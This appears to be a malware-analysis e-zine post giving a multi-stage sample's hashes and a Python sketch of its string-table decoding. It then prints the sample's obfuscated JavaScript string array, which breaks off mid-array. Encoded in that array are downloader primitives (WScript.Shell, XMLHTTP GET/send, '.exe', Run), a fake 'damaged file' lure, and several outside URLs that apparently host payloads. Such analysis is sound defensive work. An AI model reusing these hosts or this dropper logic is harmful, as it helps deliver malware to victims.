Since I’m nostalgic, my company now has an official e-zine.

If, like me, you’re old enough, it will perhaps remind you of the golden era of e-zines.

This is the full analysis of a multi-stage malware.

Sample hashes:

MD5: A3BF316D225604AF6C74CCF6E2E34F41

SHA1: D20981637B1D9E99115BF6537226265502D3E716

SHA256: 00476789D901461F61BDF74020382F851765AFCD7622B54687CDA70425A91F86

This is the code I wrote for JavaScript deobfuscation. Before running it, replace the BASE64_JAVASCRIPT_PAYLOAD placeholder with the Base64-encoded JavaScript payload.
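For orientation, the obfuscated sample keeps its strings in a Base64 table that is rotated once at startup (0x9d times, via push(shift())) and then read through a lookup function. The Python sketch below mirrors that idea on four entries copied from the table; the helper names rotate_table and lookup are made up for illustration, and the real script caches decoded values, which is omitted here.

```python
import base64
from collections import deque

def rotate_table(table, count):
    """Rotate the table left `count` times, like repeated push(shift())."""
    d = deque(table)
    d.rotate(-count)
    return list(d)

def lookup(table, index):
    """Base64-decode one entry and interpret it as UTF-8 text."""
    return base64.b64decode(table[index]).decode("utf-8")

# Four entries copied from the sample's table, purely for illustration.
table = ["V1NjcmlwdC5TaGVsbA==", "UmVzcG9uc2VCb2R5", "UnVu", "R0VU"]

# The sample passes 0x9d; the loop "while (--f)" after "++d" runs 0x9d times.
rotated = rotate_table(table, 0x9d)
decoded = [lookup(rotated, i) for i in range(len(rotated))]
print(decoded)
```

With only four entries the rotation wraps around many times, so the order seen here is not the order in the real table. The point is only that an index is meaningless until the rotation has been applied.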

// first stage

var a = ['R3NGSlI=', 'R1lNeE0=', 'MTB8MjN8MjZ8NnwxMXwwfDN8MjV8MTh8MTZ8NHw1fDIyfDJ8MTN8MTl8MXwyOHwxNHwxN3wzMHwzMXw4fDl8MjR8MjB8MTV8Mjl8MjF8MTJ8N3wyNw==', 'WT9sb2ReNlVrM3JdWS44W24sSkRLWSpJIFlQMGkgPGpyaEZPNldhKmJAWEZEUXJPMHF4KjhsOk5vUnltd0B3aUtEKjByIVVxcGJbQmU5RCRDO0VFQWZsal1oLiUgZGRReWxxTg==', 'UnFURWMlWHNnak1wcWk3QUxnR2NtUVtHa1EsI0NxeU1OTiNrdVhpZkoyJUU8OXhdb1EgP2RKSkdOdHE5bGxGcThbIHpdICVbdHNmIEROZTxuWV5wLjB1NjxoPGY5Zk95cFl6ag==', 'S1FJcUo=', 'VF13RE5NaTslRmtLIE1ta0NBI0wxM1NdR0pEcXd3UDJFclUxVyA2IEBpdVtPaj8gcjNHTG5UdTtCVCA4OiEuQk9SQW45RDJFSlVlW0liIS48SEwwYk94JDlKQSBFOHBiSVh6IA==', 'aENjZ2s=', 'THlhbWk=', 'cFpubGs=', 'bFloeXE=', 'eVhFWGg=', 'VnpiaGg=', 'YXlTTGo=', 'SWdMYmI=', 'SE5jTG4=', 'SGxiTU8=', 'bW9ZYWo=', 'YmlPUmI=', 'VlloSHI=', 'Wm5LaXg=', 'SFRPRWE=', 'SHFUR0w=', 'bVRBYlo=', 'QUpYam8=', 'ZkNRdU0=', 'cFRjQ1Q=', 'YmNFQ0s=', 'Szlvd2ZUZTwgXWxkI0dpeFpJbUlUS0hIOHRAYS47S3kgQWU/LiBFcTtBakFCW3lXV0Rnem5hMEJQSiFLZnVnPypRSEg4MDFrUHBNTkAqODBdZyw3ajFwRTNVUXFzUm5jekUlOw==', 'Zm13c3Q=', 'a3B1VEw=', 'OXw3fDExfDEyfDZ8NXwxNHw4fDN8MTN8MHwxfDJ8NHwxMA==', 'RUVybjxvQVN0c1dYTy4qOEw7U1FiM25QQ3haVDgkWDBecGRqIHdHXXBnSCpZMVAuXW8xZltIQkJtRkExVyFNdE05VGFCMGFQQ3BNeEcsVTo2I1ByRmdNOnc7Nm5wRTY2OzJTSQ==', 'MUdwTGtKKkZPZGFOU0xGenc2XWVAb0M3R2c7dVFmM01HI2oxTSx1YlR0YyBmZzx0N0tJdHg4IXNBIHEjencxcGpYZlIyaDdEUV1nSkRRRWpURDE3LC5KLCAkTCFUQ1lvVDIqSQ==', 'Klokc3FDYnIsP3NAMFhTJCBCbXJsT3Iyd1hrIXUgdGwjMSNFI2olM01EbG5aIXQzenpHcnNuSTo5MldrR0w7aUxVIHBjbnRVNnR0WU5MZGRFNzxAKiBKLDkqJDgjeSBnXTFVIA==', 'TDJMY0MsdSRkYypAZy5xSDdsUVNXOjp0MWNJSENrY15iIVNnI0k2JERjZ05JIF5OWnguP0JBWWssWE1QPCBwckJqZzxKIFc5V2FTQElCIDhNWVpHMUJpW1RbXkg8IDd0ZUdTSQ==', 'bypxVy5GOkJTQm8jZTddcGJnVS5DKkpOIGlueVd5ODdwUkt1Yyp6TXNzdFRbM210MDkhMExuaFMsNmF6O0ZALEBUTk0heWFQOUteWUxUY0ZlcGZPUmtoRXN5OFpKUGV0VU1RaQ==', 'VGhlcmUgd2FzIGFuIGVycm9yIG9wZW5pbmcgdGhpcyBkb2N1bWVudC4gVGhlIGZpbGUgaXMgZGFtYWdlZCBhbmQgY291bGQgbm90IGJlIHJlcGFpcmVkIChmb3IgZXhhbXBsZSwgaXQgd2FzIHNlbnQgYXMgYW4gZW1haWwgYXR0YWNobWVudCBhbmQgd2Fzbid0IGNvcnJlY3RseSBkZWNvZGVkKS4=', 
'Tm90IFN1cHBvcnRlZCBGaWxlIEZvcm1hdA==', 'c2JVaFk=', 'anJbbDtZbUI2bFQ7OlRKQCxPOUpKSGI2ckMhPGdVQ0lETG8yLiB0QTJ1eko5PCFdaXUkY1tPWSMsTVVUY01NUixpYlhLQkNRbE1qUyE/RVchcTEsTiQgIDlJSTEuLlMwbyRvbQ==', 'VU9kPDpBQzE2TVEhc0RmNl4jXnJxW0l1Ok1HW1F1cFJ5SyNINmg7OEdHOyVla2FwVTpzLFJNPztdOXkzcXo4Iz90ZSBkJWtAO0sgOzFxcmQ7IXE5T0w6IHQkWSRmcENuQUxYTQ==', 'VmhFZlg=', 'UnhWTmE=', 'RXFqMHFFIHlVeGo7TDJlbyBub0dLW0lkbTdwQ2lvNlVyO15AVXEjPHpZSlUuSHFQOUBwa3hIYiVeYnEhcUhebVsgUF5lU3AhbkNyI0xHc0ZmIG9GLiA/MlIjUHRVWTl3V09Fdw==', 'Q2lwd0k=', 'UUNpZW8=', 'RVJUaW8=', 'UU9VbUI=', 'b3NmbUU=', 'VkFtcW8=', 'UVZvbGI=', 'dHF2ZG0=', 'ZXRrRmY=', 'dUlTZ08=', 'b3hBREc=', 'WFhKc3I=', 'eGxRUVo=', 'ZnRvTks=', 'QndUbHQ=', 'Y2hhaW4=', 'dWdja3A=', 'TU9MTG4=', 'RG9PZnU=', 'SUFNYmM=', 'akZLUnU=', 'MTF8Mnw0fDh8MTl8MTZ8MjF8OXwxNHw2fDd8MTJ8MTd8MXwzfDEzfDB8NXwxNXwyMHwxMHwxOA==', 'V2xIYWM=', 'b0Vxa2U=', 'd2xKS0g=', 'WlFJU2E=', 'QVJRa0M=', 'cVRjQ2M=', 'WmlSYUM=', 'Smd6V1g=', 'V1ZhY0g=', 'V3V4bHM=', 'VVRaUFE=', 'clFmWGU=', 'SXhmT0w=', 'SVNocUo=', 'dENRTGM=', 'cWRtYU0=', 'RXRKcUc=', 'VlpvZFQ=', 'ZVd3TEQ=', 'S0VrZ0Y=', 'aFJLd04=', 'dVFxRHM=', 'VWJ3YUQ=', 'RGpwZHU=', 'enlTRU8=', 'RkVleFk=', 'cFpLa28=', 'QkhIU0M=', 'aVdRdHE=', 'elFhdkY=', 'VXpMYlk=', 'OHNycS47LndVUWVNQUpJOTtHMTFTXiVMck4yS15ob3hDaSRDUDEzNlMgZzwlciRAOixwN3hJIDpEJCxETlBbc0ZxdVtqMGtNalM7cXNIKlteIGhOVFo8RUt3dSxiR0ZXb3ksIA==', 'MVkja29eZE8kQyVIcCEhZT9oWHdtTXdAIXNQLGI3dHRCM09LdEZQW3dIWFRFIExwSDlRO3BsTUgsZ2kxZUBaJSFUWVRCLksgcWJmNzJoYmJxU1E2ckx0MjI/OSBHMkRHWVg5Qg==', 'QzJaTF4uI251RFNHWWIuTXBELjpFUmIlZHB1c1RjckBkJVs7IEhJaEFJPDs7RSRTXUhHamkwaD9bbmk5dF5qeDowIGxdal1rNlsyejE3Zzd4b14sJFR1JVpiXiM4Z05qJXJ4WQ==', 'cmkgSy4xN0dnWyp3ZCQzNnhrIVRCOjxkdURMcHJtR0EqblFTZFVsdWRMN1c7ICQ5IFBraFc5ITBIVW5SZzJveiRFR0gkI0hxREsqQWwyI0Z5Kl1UI05jZ1E3IEhUMTNNIV1zMA==', 'd1VVIFVlNmg2KnllMnAweW9zTEZwSXd1MiBKeFtaVSAxZWdKUFQ3dEokODgwdEN0O1N5aEggQXVmOTI/VV0xVUQ/IE9YaUFuYzAhOV5ZUmU3QEZdVWJUMGhQPDFDMTJNZlBDUQ==', 
'aERKJCB1Wko6QVtdaiQuZmV0UmU6QFVpdVdPN2kgc3lOQjhtdGdrOSBlRVk3RTdMT2NzNmlxOmtVN1U8SHksIzFRbWdTOGUzaiRnVWZpY1k5VU4gWndzTCRHIHIgS0NaR2RORQ==', 'ak83YnpLQFQuSFplbEdDQFJOIWkwWnNXQ2lJMmR5c3M5QyBOT0BIJF1CYkk7aUs4dV1rMSBFVGFueHVER2NSLEducHM5PFtVcUp5SDNhYk8hYzMheFNXaUosWDNIWF46TmtyVQ==', 'Z0lXUiBjTjBIJDdqKm06Z1FdZ1t1az88UDBYW1tjIFteXlBHUG4wVGdJIWIzUGVCUFtwYnh3QWtqOkJFOEhSQW9EcVdtMFlwICRZOmtoSG9TZERTYW5yJSAlQV5sUWk5eEtaIA==', 'PF5CN3E6YlhFdCBqLnhEbiAhZ1VrTWw/enpvWEtFLk0sOUxYclJXbyU8b0txVEUkZV06cGQyLCpFLGR1SSM7M0NoMWFTY2wlUmpePyBJY1M4b3Q4KiBvaWskJWJdbDxCYlFeZQ==', 'TTNJSElqTyxuazcwPz8jIWdPUDBuMkZMPGpPMTF0SkdMYSBlZGxLRmUzR3MjOWwzaTF0OHViMXdMTkE7JEdGRGY2aCFHQHlkKiosWG9LSDJzMk56NzkgWypEQmVjYzBoak51Zw==', 'ZDdyV2xbQF13ZHczTF1oOFFMOWRAJSA4MTgzZEVSaEYyWGwxVXlsS3hCJDlxQWokKmRGeUp5Qm8weFpCLFkgUndUQVF1UzY5QzY6d2VnN2Y7Tm45eiN4THBLI1hQbWshUjs3XQ==', 'KixuN29MTzsgVXFyWUklMlAqRy5QIDo6R2l1OFVzWFlbeDo/I0VxT2NoIFhhbU9FMyEyLlcgIFNsb29wblt6Z3FLaEs6STkgeUFQUW86XSR0aT8zTjhaQkgjdW5LVU5MM2loIA==', 'TCUgIGVIO1FOSkdKKlggWThmIDBybklLYmZOZmx1SnltSiMxaiFpVDhrKlhGejpzRyB6O0VdRSBFMFViLj9GZ1FBVyMhcmszaUclaF47OGYydzFzY0tXdENiIzdYKnhlUTFiTQ==', 'SkBdOllCLFIzelhwaEFFayAlOlE2V1NASHl6OkxFRW5eW0IgQ1ViQmIjXm04IyE7R0Y2eFJTdXE/I1FpUTBtU1hvLm5ebS5zcCojeF43SnFybUxsITYhVGN5RywwYz95QXpMRA==', 'O0xIQCF3bVh5OjhrbyprbHFpT1cuQVRbMnBHcDNvaEg4cyBrOFVPOCFnajJHQWRKcz93XWQwWlI3aHFGbEpPMV5RIENKYW0wQXpZWWxqR2YgNlR6JV5iSmw8W11odFdvPFtzYQ==', 'T254IHhGWkpiclJaTkM3eWIlZER3JFh0P1VHIF5hd3lvdU1ZbFFbKm1jZkhER2cjSnE4aF1yVT9DUV5kMSBtN2tPaDE/aVJMMHQzbGVAI2dzTj9keVo/OyA7aGVLNltOOiBFcA==', 'YXhhYVk=', 'c3RZTmc=', 'c3RyaW5n', 'd2hpbGUgKHRydWUpIHt9', 'bGVuZ3Ro', 'N3w2fDl8OHwzfDEwfDJ8NXwxfDB8NA==', 'SmdUSlc=', 'cVJYSWI=', 'bk56SGU=', 'aHRmeE0=', 'V0NWaXU=', 'Y2NlTmo=', 'WmFhY2U=', 'WkVTZmM=', 'SnFFeGM=', 'eHd3V3o=', 'c0tabG0=', 'elhlZGI=', 'V2JRVWU=', 'a0lYR3E=', 'enNPb0E=', 'eHlkdkc=', 'SlNOdm8=', 'Y2FsbA==', 'YWN0aW9u', 'ZVduTlg=', 'TVpmYkI=', 'd3R1U0g=', 'dWdwU3Q=', 'dENvVG8=', 'S3hQSEU=', 'dFl5aWw=', 'aUtna3Q=', 'QnhmbE0=', 'QXpLbmI=', 
'dWpnbWQ=', 'ZHRLYkg=', 'TXlPYmc=', 'dmtOQ3E=', 'UHFObHI=', 'REZBeng=', 'aWRmZHU=', 'UW9qQ2k=', 'QXhKRVg=', 'alBncHk=', 'clBxSmM=', 'YVV4UXg=', 'YXBwbHk=', 'QXhJeWE=', 'ZnVuY3Rpb24gKlwoICpcKQ==', 'XCtcKyAqKD86XzB4KD86W2EtZjAtOV0pezQsNn18KD86XGJ8XGQpW2EtejAtOV17MSw0fSg/OlxifFxkKSk=', 'aW5pdA==', 'aW5wdXQ=', 'VkV6Y2g=', 'YmZxemY=', 'aHdadnU=', 'YmFyUlg=', 'WklSQng=', 'SHZTUW8=', 'SXJQQ3E=', 'dGVzdA==', 'eEJrSVY=', 'WXpFQXQ=', 'em1PV1c=', 'SlZ1TXU=', 'bHJkZHk=', 'cUVmdW0=', 'YXM5ZkY3cXltcEpqP1tVPEBicEM8MEBhXXN1NiBzS1A3ZVBETFJtLkhlc2lTa2p3VCp5LGQjaF07MkxlMmlwclg6YiA6WG1GaHB4U0pvW3BIaFlEZnNVUGdOI3hUN2kzIFpuJQ==', 'WmtxLkUybyAkSnReWHAuaHE5SkxJOU1ZSVMqQiByaVNpbDNkNldTeGpTM0BleF5hKmRxJDA6d0BdeVRFTTw8Q1k3cjluQS5uJVA3VUo4JGE7V0FKYlQwQTZuQDp1MFlAQiAwTA==', 'Q01DICpUeVtsQ3VCQSMxQldpJGZlLGNGT3cgW3pRd09YMWZtb3dQUDZ3Y2ZDQEYyTVMqMzw5MkoyIEp5V2lRS29kLGZJa0BDMDBsdTd4JEZ5XUo/JFNiIGFFM0NYPEBsPHRxPA==', 'Xi5FaCQuXjBdWDhoIEpPQyBuakFFbyF6SHMyYkxSYUFHcC5BIFQgRl5XXjtXb1tLbnIqTnJsRUlxIDFuaE5nYjJbS09eZU9XPCBqaktoIHg7SlRtYTtJRjlzJVhYVSRmZSVhSw==', 'IEpkYSBldHg4TmlzJDB6ZiMgbU1pOXIwS29mYmo7IFVhJSMwOmtUTTNSSFd3RXQgQEBTcXd1ZXNjIDxkLkFEO09vODl6Mkc3Q1pXQVllI24lSXQud2diZyE5TjB0Qzd4VE8gUg==', 'MHwxMnw5fDEzfDZ8MXwxMXw0fDJ8M3w3fDE0fDV8OHwxMA==', 'QUJjdVU=', 'ZCQ7VWJlTGpUbFliWHU3aSRPO1JTcGlISF1wbm5PMVE7WUVlIHBCQ0VOciBxXmxDeXM7N0A2SEIlZD8kQiVhTEFkUHggYzJESU0kTzNbYmhIeklETmJMaEN0PHRGSncgI3k8cw==', 'eUhDMXdleF0lIF1RXmVJYU1tZGlnSGklXXRtQUU8RSV3ZyVaJU1JLklIQy45SENYZD9OeGNmW2VqSkguTTFXb0hGMHohIW8gQVE/TVUyRiVkYkxGMnoqaVNLXlRMZl5ObkJiRQ==', 'S0FRc1U=', 'IGxjSFBpM1lkZDlbIVBRSiNNXiBya2lGNzhVSzosQTNTY0NDc2o4S04qbXF5OnMgXSpeP0BXQHhuQltBT0hCY0pUekFCMC5vVDpGb0NiSUZ4YUBrVGI5JExjV1ttZXkgUDBzXg==', 'R0w7RDlwMURzQWtMPGMyVD90eEpveSAjP0p1RHI5bjcgd1pHLERmQTJkeXNNXjFiUHI4eDg3ZVgxJV1YS3IheGVrODlkWyFUYU1nXmZxMV46QGIjMUBkUFI8PCohcXVQPzt1eg==', 'RUlNSE4=', 'cFdxYWE=', 'Qk5CeGk=', 'Q1RZaUk=', 'QWpGU2Q=', 'SUx4cWU=', 'VmJmeXY=', 'WUNVWXM=', 'REdrZnY=', 'a2lFbmE=', 
'Uk5zeHVGOSVmdzxLMXMueXNwS1h4Tk4jeSNBMkpTeG9EOCR4USxEUSwgQyV4PzJPWSMuRkRKICBdOHFoR2psOlRZIEEyWmRiaiNJT15QOTlwJVddWG5eOkNhRTIhOXozJE02Uw==', 'VEd0VEE=', 'QWZPVno=', 'TXJsaVVXQWIwdXIgcDp6OSpaMEhHRjoxPzlEb2RBQWVIWl1KUXVeenhSVExkT1Q7cW0zaTYlJGlQbGZ4P3guRmdLREwwQXklNjZtSi42LkNZPHNwODlvbUJxTGZjclUxUlllRA==', 'eDxYW0lORmg8OGx6MSF6amFOPHMgS3V0IHcgSHJVUXU5STpYR0BkWUhaTixQVUkgQDhCdDksUnogQTNic2d4KiRYWippYkJLbTEwdGpaYWRuYVA7IGs8JU5dITo2UD8ua3o4Tg==', 'a2ZDTXE=', 'Z1NxIFNmNzFxNnlCTjxkcDhPSF5xZz8/WkZDUXNLcFBMc1BmWm1IWlpNR2NNcERtMENSTmhxUHAzT0NJaCBldGRPVXdTWERoUSBDZnBDP2UqZGRDdztGW0dQU3N3V1FZeXo4Zg==', 'bE5Eelg=', 'emtTd2I=', 'MSxoIE1sSWVuc0o3ekRbSkYzJHoleiUlSkRHeE10OFAqT2E6Zjp6P096XU90WVQyIWNNWDN6d0s4aUxtTzNvREphcDZHOEAzOFRmVUVRdFt3MEdeIFlUeltiNjM6T0Q7I0FHXQ==', 'aEdLY3I=', 'VGh5RWo=', 'eVNKTGg=', 'bXZpWmE=', 'WERBbGk=', 'WVVGVU8=', 'Y29uc29sZQ==', 'OHwxfDR8MHwyfDd8NXwzfDY=', 'c3BsaXQ=', 'ZGVidWc=', 'bG9n', 'dHJhY2U=', 'd2Fybg==', 'ZXhjZXB0aW9u', 'ZXJyb3I=', 'MTJ8MnwzfDEwfDd8Nnw0fDV8MTR8MHwxfDExfDl8MTN8OA==', 'Y3dtSWE=', 'WFRXa0s=', 'V0FUano=', 'ZVRVZXc=', 'aWtEbVk=', 'RXVpeGg=', 'RlJ4ZmE=', 'VlFsZlY=', 'WGlKd3Y=', 'bXdvcGY=', 'ZWx3ZEM=', 'S3NraEQ=', 'Q0t3Qmo=', 'SktjTmY=', 'ZFZydk0=', 'Yk94ZVE=', 'TEt5Ym55Y0AgSjdIcTFoZVBSSSxGOHgwYyB0Tk5CdyBjUk5qUCFUZjZtPCE6bU0gRyBhJUhNUHNFXlp6Z09GejJLSmUwNm9MQ2FeIG9eJUAgI2lRdGpsTj9UaTNTOjAkVyQxRQ==', 'TGhiUlc=', 'SE9CRHE=', 'cmV0dXJuIChmdW5jdGlvbigpIA==', 'e30uY29uc3RydWN0b3IoInJldHVybiB0aGlzIikoICk=', 'QnRsTlI=', 'VUNXYVU=', 'SlVqV2E=', 'MXwyfDR8MHw1fDZ8Mw==', 'S0hqc1Y=', 'WGljbU0=', 'dkVLdWk=', 'Y29JSHI=', 'SGZFSm8=', 'YVpKSFM=', 'TmljSE0=', 'aW50a1U=', 'WVNxREc=', 'RGFUUkw=', 'aW5mbw==', 'Unpxb1Y=', 'aHR0cDovL3NhbGVzcGlrZXMuY29tLzRiaWN5L3pwa2liOGh6a194a2x6dGYtMDU4NzMwMDI3Ni8=', 'ZXRJYVRhV3hZcHogbzc3IzloRUhAcmVOakRtaEJBZnlyN3ddLlkwVzYhQlVeIUhCT3k5dW96IGpkbUxXWzFKeWEkRDpLWWx5eklRcEVPRXFCTGMuNjhlVWdoeU5jOjhJZkhlUA==', 
'YyFKWXNnbFpuI0F0MlBUUl1TNlBidHBCRndjTXVkJCB6TlhoTyAjMlNVQiRCcFVdJExURDdkIyo5cTNybWkgeW86ejJoYj8gOzg8cEhTIE1YYiVZdWswTzJXO0lHO0FlaE9KOA==', 'ayVeNkUlajdhY1M6IWc3T08xXkJFcjFDIGc5eGZMenBuVV1BWU05THpqJVdrdW4hV3AsN3F5LCouIG8qbGdONjtseE1CRndqUlhMTVQlcTsqUjwqQDM5RDdvMkxVQDE4I11ZSQ==', 'OkNtOHQgPFogTVIyOFc7RCV3IHNUTTgwWW82blF5d1UuQSBOc0RPQVNyQWYldSBSZTw6OnBncVtELG8jTkxoLiVUQEw5IEZieT85NjdTakcwVUFUO0BRaHpZaHl3YVN6UjcxJA==', 'PyFxYmltIS5VVy5kTldHQiwgbEBOa0ZCM0huMkljOkFuYzNAbix6PEdoR108bE1JdEQjUlN0dDlIR2xGIUNdXlFkU0RBOThwbkIhTyB1eENockBBV0ReQFhDcUxmd3dmc2hpeA==', 'RHVJMkQqM24wTmJRM3kwa2tvQyFJXXBLSyVZb2VMdVI5JW8uSTNpMSF5cXl3TV5DZUdEcyExSXBVPCVGb2JUTGsgd2YxdCpIP1kyMUJCbUFsV1hZJGNzPGY6c2FCOS5MSTZ3Kg==', 'bHBKWzddc0txQCBLIEpVLDtwS1UzenA2d2FJOUozbzdMXWRVaHo2OEV6UVNPbWg6d1t5Ui5XUnMqTVhJeEo5QFN4TnpyKk8gTjIyIzowS2wxOTZtM0EuQXk/eG1vZjBXaVJIUQ==', 'N11PMyBxT202MGluZG85SHpAZkclbVU/WD9xS1BCa2hSXWwhYjgkcVdnandBakFXcXRnXThteD9FUUM7OT85MCA5al1weD9sXnd5cSwsZW9KdCRXQHQ3IWZVXUdZcl0zTUg7Xg==', 'TCRbRCNAVzEyUzNIdGNMZUthayNpICpjQEwgITtGYml5XThKeGhIT0QsOCAhJFhzQ11UUkp3Y1QxP1Qhb2JRUGJ4YzolWURraGxyMU1eaWUgMVosWSBOMm5uQz93OzZqdG1QUQ==', 'V1NjcmlwdC5TaGVsbA==', 'UmVzcG9uc2VCb2R5', 'R2V0U3BlY2lhbEZvbGRlcg==', 'QWN0aXZlWE9iamVjdA==', 'aHR0cDovL3N1c2UtdGlldGplbi5jb20vd3AtYWRtaW4vUlFEdkdtT2hOLw==', 'LmV4ZQ==', 'U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q=', 'aHR0cDovL3d3dy5iZWxvdmVkc3RyZWV0c29mYW1lcmljYS5vcmcvd3AtYWRtaW4vekFRRWdYaEVlUS8=', 'aHR0cDovL3NjdmFyb3NhcmlvLmNvbS93cC1hZG1pbi8zemVuMjgwXzQ2a3lxbDU3dGstMy8=', 'cCBydTM2MUQgemxXbkMgIDcgSkF4XlBUTiBMWW54VENAMkYxYUAlW0d5ICBNUm9ARiBVWE0jejo3ZV4jWFU8TlBZJTpLZiNnQl48USpTalk7ckhCUEBhIFNtOFE/bzZMSCxnVw==', 'aTYwODNvI111eU9PTzBrcWliJUtYRVB6I1JLcjJkIDNwOW1vWXFpSlggRjdhcnlbSGpQMmg2ZiFCQjZUIzY5Y2wqV2pIO3dSTzFVTUIwUU0gWFNIZDkjV2NYMl1VbCBsTHVOag==', 'cUtLd1h5MmNReXlnRzJOPG1ZaV5QempqSjw6SlNwUVsgXSFlQmtwMzxybXNxT0paelRLXmFoOzl3LEgwUkhTMWk5WkJhM1csN0tEeiBpY3AzIDFKaSpAYnFxeC5DV2w8UnhLIw==', 
'ISAhSEM8WDdyV0RDejZIWUhLemJDSnFxUWZzUjxRZk8gY1c6bzs3ZEdJVWdtRW9VemQwI2ljTjtCSiNDcCxvS0hQSENuZ2YwKj8kYSQ4aiA4SzNROEhbV0BkKltpeDoyRCAgUw==', 'Wkk6cHE4by5RRUUlaDw3KjlAICVtcjNlYTokIFldIXVtUEQwJXkkaS5BN09MaE4xeHpwV2lALEZhczJObG0geERJZzxISXkhOTZAYSAgOjtyIGFINzxCIVNBeSAgLEBVcV06Iw==', 'IU5KJEM4cjJnUFUgaywsYVRUI29aMCpzTFVlZzhNPGJTNzxuWFojKjAzQlMjRFloZXA7Y2xYbWUhIFg8ciB5bGogLE5UUTguaGxXUnBUeCBqRiRjR1VRW1MgQz9tXXIyNnNOQw==', 'MHFCZXc/YSMkdTozIyRxc10qRm5LV3luI3VHOjIheltRTzphIzFSW01FKmFlT0hFR3gkMyVHQXglTGx5TWFtKjZGP3dZRktueGlNbkRPXkttTkJScTkyeU1scnFrZiAuOV5NSw==', 'UnVu', 'UG9wdXA=', 'TVNYTUwyLlhNTEhUVFA=', 'R0VU', 'b3Blbg==', 'c2VuZA==', 'aHR0cDovL3N0aWxlLXN0cmFuby5jb20vc2l0ZWZpbGVzLzBuNWt2YXBfZTQ4ZzkwcS01MDk1MTAyMjQv', 'RHBaYjglZ3lhQ3BaWHQgeENCMHoyPHM/VW9xQ1NUPGNdcCNbbHdrME9adFJCbUEgM0lUcVE6TV1RZEl6S0psV2RXOTtaMVAkTCBNIDd4XT82O3gwSmplZUtwXWNwdyosLlggTA==', 'ai5dOFRqYVFXbGVOd0dRMy5tKl1jKkx4ME1DSVI2IUV5YXg6OjcyNnNCZ3clcFtET0cqSXI4T20hbFo4WzAgZWRPSDszIG87NmVnRyNCVUxxUW47U3FkSEdrRzNHTUxIJW1LPA==', 'IWg5JU9pZXNzT0RBT1BtLmptOjlTd0MyTTJYXSBAWzpsIEJLRixYWWxRd2EgQXhQZyAgWVg5LGldN0VdJUBdLERYIGVeWVJNUnVKKmlQIDFheE1OO2tCXiBAIVpII1NjUSRHeA==', 'eSNzUFhqcFV6OTxkTU0zWXVYPHBwLiVscExCajh6JVlnQGU3XSBnVHVIQ0JxI1g6VDdpbEJwaVpFQiA6ISwgcUU8O211NzFUIGVEQSE8P0tdaUVmZ29reHIgIGxJWzlURFJFWQ==', 'ZGVidQ==', 'c3RhdGVPYmplY3Q=', 'dlduTWs=', 'SUNCcHg=', 'cFdsSU4=', 'c3RhdHVz', 'a3dtSlI=', 'Y29uc3RydWN0b3I=', 'U09NTVA=', 'Z2dlcg==', 'aUxEd2M=', 'anpRSmw=', 'eCBEQHFkaC5jI09HOGReaXkjanVpTTw4TS5IVFguJDxnbCNMUmNZQ3hjLEQyRD95JVJVS3RZdSpjUTlJQjFuZFMgIUNldHJpUlRGeFRDRSpAUDpVbUxHKlMwdyVlIFEgP1UsSQ==', 'ZTkkVWVINzI2IEVJTnlQJUBpXWxxI15MU0NtTHdYYWUgbThmZzltS0FtJFRhKnEqXSUqNzZUV0NlclVIcnRNR0VZUFMzYmE5cDBLTVlXRnMkZXdmRm06TlgsZ0l1M2UuKlNvIA==', 'Y291bnRlcg==', 'UW5mbmo=', 'RipmcmFUcDN0Zy4gcEMlIEpCZnV3ZVA4TVoqRyBDbXk/LkluYXpQcDcgWTtoNyA4LFAzKkFtR1RsZUt5aW9YTm0gOWFwIXBGcHU6XWZPQXd3YUcgYmtkaSpaMFJlcz85bCxvNg==', 
'ajZDWEJXOEM2dDwlXiBLeEsgV09rRWJreiQzQXVCRXc6T1VEcHhqUFlMdVtlaGtZbGZOQ2g5P1guN0dkJVk7OEJ3N2MwUU1QcGlTUENqOmY7Ol1nQyFpT01ySkZiT15TY0NLTg==', 'cW0uWzxAaXQwMCxtVGYxZnloSWwzYU84eixUU2kgO2hbRUVbKkdqclJual0hMDcgQip4MWgzSUtPTkJNa1RGMWFxLiQzQzgkME1LRjpVaFFqbUt6MUlaYnAhdFpQQElzVSNFIw==', 'ZU96LixKMEFhMHBeI3g7IyBuOU04PDFQRSBZPCQsQGh5W0l5QDhJYkNyQCQyQmtKeHBiSS5nIHBpTDJrT3d4Tztpd00gd20gIzIzSWVObW1scFRQNlROYWR1cTtpTDglcl1daQ==', 'UVBvVVg=', 'YlJXTGc=', 'YUt0d2k=', 'aHRhaXo=', 'RUNCV1g=', 'a21xbGg=', 'V3N5VHQ=', 'OHwzfDEwfDl8N3w1fDR8MXwyfDZ8MA==', 'RlRUI1dyY1FIRWkuMypHT24sOGJYbm82Q0YwZFB4aWx5XTk4d0AxcFhkdyBDeU5jMkZiQEh5SWxILkBhUWJwendlbUVBbkY2VyVXVyBOMjxaZVs5d1UxUWc8LmRhbEkyTjhJIA==', 'NnVNPCR4PyR3dVlPbF1wZWQuaG16V0Q/OUF3cHBYZlBwelBVWFJHR2pKLnM8IDlaJEZRRDIkOUMjYUhsWTp1PFFNeSB3SE4kSj9ZSG1MbkFeaEdmPHU/WEwgNmw8WSw3S2NmLA==', 'UjpYIUs5blVoOVJRZk02V0lnUGg5aDltTjhvejB3PCFPdSAgazJmICBLeUQ6QSBuQUVAPFhOOFJDcGJASWpxMyB3UGRAMipwICAgLDhXJE5SdTt5dW04bjtbSGxBZ3NbSWJieQ==', 'YmJVKmg3eGNASnJXOT84TmhTXT9tOkJITDAgaCpOU2xsMixBZ0w2TkhtTkFMJEg8LmtDIUhBUmsgdCFqT0hmP1FLTF1nUmdPcjlJQyFkNzYxJGJ1OUxZQEAjRyQsUSpzZG5oTg==', 'dEs8QE0gIDowd3klPHIuQ3hkUnFpeF5TW3QuXUwlYTIzPy5idVksRTlNLCppck1abyo5VERQUEZSeFVBazZnN1Bqd0JhIHNCLCFodG5BcTdENnNFM25VaT9sb2c4UktyVTFDIA==', 'Tk50cFhxdTt0enVaNyBUOT9zYyBPICE/d3pxN2g5eFtnaj9UVUlTQTZrcFJbdyo6T2I4YVtxSFlnRjA3YlpidUNLPCNYWkxIU2g6XU1qZlBtQ3FFMSFaTFFiMiVUcCB1IGNnNw==', 'aHBlQEM/eC53MGEhXix1N2U8IWMyMUdeUGFoc2kld2MqIEZvdHFlSUhMeFtrLjhaRDtpZlAwI29dV04gU2U4bjFIREl5dXFCXmwgXiB3emNicHNpWSFJd1U8U2IuaG8sRkhYJA==', 